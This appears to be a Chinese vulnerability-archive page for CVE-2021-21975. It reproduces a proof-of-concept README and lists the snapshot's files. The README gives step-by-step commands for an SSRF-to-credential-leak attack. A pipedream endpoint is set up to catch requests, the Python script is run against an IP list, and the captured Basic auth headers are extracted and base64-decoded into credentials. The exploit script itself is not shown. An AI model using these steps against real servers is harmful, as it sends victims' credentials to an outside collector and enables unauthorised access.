关联漏洞
介绍
# CVE-2021-21975
#SSRF-POC - ssrf to cred leak
#First configure pd client.
#Now run ./pd deploy http-new-requests
#now replace the pipedream http request ex: Randomstring.m.pipedream.net in the script
#run this in a seperate terminal - ./pd logs new-requests | tee -a req.txt
#and now run this in another terminal - python3 CVE-2021-21975.py iplist
#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt
; base64 -d basic_uniq.txt
"This is a early proof of concept created when the vulnerability went public at the time months ago, so use it on your own risk." :V
#credit
@wabaf3t
@D0rkerDevil
文件快照
[4.0K] /data/pocs/cdae556002190fd296ffc4989c5f8d4595808098
├── [2.2K] 𝘊𝘝𝘌-2021-21975.py
└── [ 637] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。